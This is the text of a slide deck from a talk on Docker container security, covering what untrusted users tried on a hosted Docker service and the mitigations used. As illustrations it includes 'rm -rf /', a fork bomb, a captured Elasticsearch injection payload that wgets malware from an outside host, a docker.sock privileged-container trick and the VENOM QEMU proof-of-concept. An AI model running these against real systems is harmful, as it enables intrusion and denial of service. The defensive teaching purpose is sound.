Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Lessons from running potentially malicious code inside containers

361 views

Published on

Lessons from running potentially malicious code inside containers.

Short talk given at Docker Oxford / doxford

Published in: Software
  • Login to see the comments

  • Be the first to like this

Lessons from running potentially malicious code inside containers

  1. 1. Lessons from running potentially malicious code inside containers @Ben_Hall Ben@BenHall.me.uk Ocelot Uproar / Katacoda.com
  2. 2. @Ben_Hall / Blog.BenHall.me.uk Docker London Organiser Software Development Studio WHOAMI?
  3. 3. “What happens when you give anonymous unrestricted access to a hosted Docker container & daemon?” This is how we [try to] protect ourselves
  4. 4. Learn via Interactive Browser-Based Labs Katacoda.com
  5. 5. Multi-tenant system PaaS CI Servers Untrusted 3rd Parties Docker Security Practices
  6. 6. The first “hack”
  7. 7. $ whoami $ pwd $ cd / $ ls $ apt-get install <some package> $ passwd $ rm –rf /
  8. 8. Dockerfile RUN adduser <new user> USER <new user> $ docker run –u <new user>
  9. 9. $ uptime $ free -m $ df -h $ cat /proc/cpuinfo $ uname -a
  10. 10. $ reboot $ shutdown now
  11. 11. “It also allows the container to access local network services + like D-bus and is therefore considered insecure” $ docker run --net=host -it ubuntu bash root@ubuntu:/# shutdown now root@ubuntu:/# $ docker run --net=host -it ubuntu bash Post http://docker:4243/v1.20/containers/create: EOF. * Are you trying to connect to a TLS-enabled daemon without TLS? * Is your docker daemon up and running?
  12. 12. Docker out of the box covers a lot but not everything…
  13. 13. $ while :; do echo 'Hello World'; done
  14. 14. Log Rotation since 1.8
  15. 15. $ fallocate Operation Not Supported $ truncate $ dd
  16. 16. Root users can write to it. If you can write to it, you can fill it. $ ls /docker/aufs/diff/<container-id>/ $ cat /docker/containers/<container-id>/hosts
  17. 17. Bandwidth
  18. 18. Difficult to restrict
  19. 19. CGroups and Namespaces
  20. 20. CPU Shares
  21. 21. :(){ :|: & };:
  22. 22. $ docker run -d -u daemon --ulimit nproc=3 busybox top $ docker run -d -u daemon --ulimit nproc=3 busybox top $ docker run -d -u daemon --ulimit nproc=3 busybox top $ docker run -d -u daemon --ulimit nproc=3 busybox top efe086376f3d1b09f6d99fa1af8bfb6e021cdba9b363bd6ac10c07704239b398 Error response from daemon: Cannot start container efe086376f3d1b09f6d99fa1af8bfb6e021cdba9b363bd6ac10c07704239b398 : [8] System error: resource temporarily unavailable
  23. 23. Cgroup Settings • Limit a container to a share of the resource > --cpu-shares > --cpuset-cpus > --memory-reservation > --kernel-memory > --blkio-weight (block IO) > --device-read-iops > --device-write-iops
  24. 24. Namespaces limit what a container can see…
  25. 25. Seccomp & AppArmor
  26. 26. The Warden Based on Docker API + Magic Snort for Docker?
  27. 27. Sysdig Falco
  28. 28. What happens when it all goes wrong?
  29. 29. Hosting provider becomes unhappy
  30. 30. org.elasticsearch.search.SearchParseException: [index][3]: query[ConstantScore(*:*)],from[-1],size[1]: Parse Failure [Failed to parse source [{"size":1,"query":{"filtered":{"query":{"match_all":{}}}},"script_fields":{"exp":{"s cript":"import java.util.*;nimport java.io.*;nString str = "";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec("wget -O /tmp/xdvi http://<IP Address>:9985/xdvi").getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str);}sb.toString();" }}}]] http://blog.benhall.me.uk/2015/09/what-happens-when-an-elasticsearch-container-is-hacked/
  31. 31. C /bin C /bin/netstat C /bin/ps C /bin/ss C /etc C /etc/init.d A /etc/init.d/DbSecuritySpt A /etc/init.d/selinux C /etc/rc1.d A /etc/rc1.d/S97DbSecuritySpt A /etc/rc1.d/S99selinux C /etc/rc2.d A /etc/rc2.d/S97DbSecuritySpt A /etc/rc2.d/S99selinux C /etc/rc3.d A /etc/rc3.d/S97DbSecuritySpt A /etc/rc3.d/S99selinux C /etc/rc4.d A /etc/rc4.d/S97DbSecuritySpt A /etc/rc4.d/S99selinux C /etc/rc5.d http://blog.benhall.me.uk/2015/09/what-happens-when-an-elasticsearch-container-is-hacked/ A /etc/rc5.d/S97DbSecuritySpt A /etc/rc5.d/S99selinux C /etc/ssh A /etc/ssh/bfgffa A /os6 A /safe64 C /tmp A /tmp/.Mm2 A /tmp/64 A /tmp/6Sxx A /tmp/6Ubb A /tmp/DDos99 A /tmp/cmd.n A /tmp/conf.n A /tmp/ddos8 A /tmp/dp25 A /tmp/frcc A /tmp/gates.lod A /tmp/hkddos A /tmp/hsperfdata_root A /tmp/linux32 A /tmp/linux64 A /tmp/manager A /tmp/moni.lod A /tmp/nb A /tmp/o32 A /tmp/oba A /tmp/okml A /tmp/oni A /tmp/yn25 C /usr C /usr/bin A /usr/bin/.sshd A /usr/bin/dpkgd A /usr/bin/dpkgd/netstat A /usr/bin/dpkgd/ps A /usr/bin/dpkgd/ss
  32. 32. Read Only Containers > docker run –-read-only –v /data:/data elasticsearch
  33. 33. Is Docker Secure? • Yes. It’s as secure as your practices are. • ElasticSearch hack would have taken over entire box • I’ve pointed out the bad bits • New game, new rules to play by.
  34. 34. $ docker run benhall/cute-kittens Error: Missing docker.sock Usage: docker run -v /var/run/docker.sock:/var/run/docker.sock benhall/cute-kittens $ docker run -v /var/run/docker.sock:/var/run/docker.sock benhall/cute-kittens
  35. 35. if [ -e /var/run/docker.sock ]; then echo "**** Launching ****” docker run --privileged busybox ls /dev echo "**** Cute kittens ****" else echo "Error: Missing docker.sock” fi
  36. 36. DockerBench.com
  37. 37. Think VMs contain? • CVE-2016-3710: QEMU: out-of-bounds memory access issue • Venom QEMU/KVM – Attack via floppy driver #include <sys/io.h> #define FIFO 0x3f5 int main() { int i; iopl(3); outb(0x0a,0x3f5); /* READ ID */ for (i=0;i<10000000;i++) outb(0x42,0x3f5); /* push */ }
  38. 38. Available for one/two day Microservice/Docker Security training
  39. 39. Thank you! www.Katacoda.com @Ben_Hall Ben@BenHall.me.uk Blog.BenHall.me.uk

×